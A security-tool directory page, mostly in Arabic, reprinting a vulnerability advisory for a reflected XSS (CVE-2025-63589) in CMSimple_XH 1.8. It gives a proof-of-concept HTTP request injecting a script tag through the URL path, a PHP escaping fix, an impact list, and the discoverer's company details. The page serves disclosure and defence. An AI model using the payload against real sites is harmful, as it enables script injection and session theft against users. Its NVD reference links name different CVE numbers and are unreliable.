Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-63589 — إثبات مفهوم لـ XSS المنعكس لـ CMSimple_XH 1.8 مع إدخال نص برمجي غير مصادق عبر أجزاء مسار غير منقاة، بما في ذلك تسجيل CVSS 6.1 ومثال معالجة بلغة PHP. | Kitploit
أدوات/GitHubGitHub/cybercrewinc/cve-2025-63589
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubcybercrewinc/cve-2025-63589

CVE-2025-63589

إثبات مفهوم لـ XSS المنعكس لـ CMSimple_XH 1.8 مع إدخال نص برمجي غير مصادق عبر أجزاء مسار غير منقاة، بما في ذلك تسجيل CVSS 6.1 ومثال معالجة بلغة PHP.

عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-63589 XSS منعكس في معالجة المسار في index.php في CMSimple_XH

تاريخ الاكتشاف: 6 أكتوبر 2025
المنتجات: CMSimple_XH (نظام إدارة محتوى مفتوح المصدر يعمل بالملفات المسطحة)
الإصدارات المتأثرة: 1.8 CVE(s): CVE-2025-63589 المصادقة المطلوبة: لا شيء (بدون مصادقة)
نوع الهجوم: Cross-Site Scripting المنعكس (XSS)
CVSS v3.1 المقدر: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (متوسط)

تتقبل وحدة التحكم الأمامية في index.php أجزاء المسار الديناميكية (المستخدمة للتوجيه إلى القوالب/الصفحات) وتمرر تلك القيم إلى عرض القالب. لا يقوم الكود بتنظيف أو ترميز HTML بشكل صحيح لأجزاء المسار هذه قبل إدراجها في السمات وروابط href. ونتيجة لذلك، ينعكس طلب URI مصمم خصيصًا يحتوي على أحرف مثل "> ووسوم محقونة (مثل <script>...</script>) حرفيًا في مخرجات HTML ويتم تنفيذه بواسطة المتصفح.

تشمل نقاط الانعكاس النموذجية ما يلي:

  • سمات في النماذج (مثل نماذج تسجيل الدخول/البحث)
action
  • سمات href في روابط التنقل/القائمة
  • مسار التنقل / شريط التنقل (<nav class="locator">)
  • روابط التذييل (عرض الطباعة، خريطة الموقع، تسجيل الدخول، إلخ.)
  • نظرًا لأن الإدخال ينتهي في سياقات سمات HTML ومحتوى الروابط، فإن ترميز السمات القياسي مطلوب ولكنه مفقود.

    إثبات المفهوم (PoC)

    الطلب:

    root@kitploit:~
    POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
    Host: 192.168.98.129:8080
    Accept-Encoding: gzip, deflate, br
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Origin: http://192.168.98.129:8080
    Upgrade-Insecure-Requests: 1
    Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
    Content-Type: application/x-www-form-urlencoded
    Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
    Sec-CH-UA-Platform: "Windows"
    Sec-CH-UA-Mobile: ?0
    Content-Length: 32
    
    search=Search...&function=search
    
    صورة ملصقة 20251006203832

    الاستجابة:

    صورة ملصقة 20251006203959
    صورة ملصقة 20251006204254

    ينعكس الحمولة المحقونة gjtqw"><script>alert(1)</script>co2cu غير مشفرة في روابط القائمة، ومسار التنقل، وإجراء نموذج البحث، وروابط التذييل، مما يؤدي إلى تنفيذ السكريبت عند عرض الصفحة.

    مثال PHP مقترح لإخراج سمة action بأمان:

    root@kitploit:~
    $safe_segment = rawurlencode($segment);              // path-safety
    $action = '/cmsimplexh/index.php/' . $safe_segment;
    echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';
    

    التأثير

    • تنفيذ كود من جانب العميل (تشغيل JS عشوائي في متصفحات الضحايا)
    • كشف المعلومات (قراءة DOM، استخراج ملفات تعريف الارتباط/الرموز المميزة التي يمكن الوصول إليها من العميل)
    • اختطاف الجلسة / انتحال الشخصية إذا كانت رموز الجلسة متاحة لـ JS (وليس HttpOnly)
    • تزوير واجهة المستخدم / التصيد (عرض مطالبات تسجيل دخول مزيفة أو صفحات مزيفة)
    • إجراءات قسرية تتم باستخدام جلسة الضحية المصادق عليها

    الإسناد

    CVE المخصص: CVE-2025-63589

    https://nvd.nist.gov/vuln/detail/CVE-2025-63588

    المكتشف:株式会社CyberCrew / サイバークル

    المراجع

    https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php

    https://nvd.nist.gov/vuln/detail/CVE-2025-24576


    ✉️ お問い合わせ先

    ご質問・ご相談などございましたら、お気軽にご連絡ください。


    🏢 株式会社CyberCrew

    G1@4x

    📞 هاتف: 03-6853-5823
    📧 البريد الإلكتروني: [email protected]


    📄 会社概要

    項目内容
    会社名株式会社CyberCrew
    所在地東京都千代田区外神田1-18-13 秋葉原ダイビル6階

    🔐 主なサービス

    🛡️ セキュリティ診断・リスク評価

    組織の脆弱性を多角的に分析し、最適な改善策を提案します。

    💻 ペネトレーションテスト

    標的型・シナリオ型・LLMペンテスト まで対応。

    🌒 ダークウェブモニタリング

    機密情報の流出を早期に検知し、迅速に対応。

    🎯 REDチーム演習・ソーシャルエンジニアリング

    実践的な攻撃シナリオに基づく防御力評価を実施。

    🧠 セキュアシステム設計・コンサルティング

    開発初期段階からセキュリティを考慮した設計を支援します。


    🌐 公式サイト:https://www.cybercrew.co.jp
    🕒 CyberCrew — شريكك الموثوق في الأمان.

    تنزيل الأداة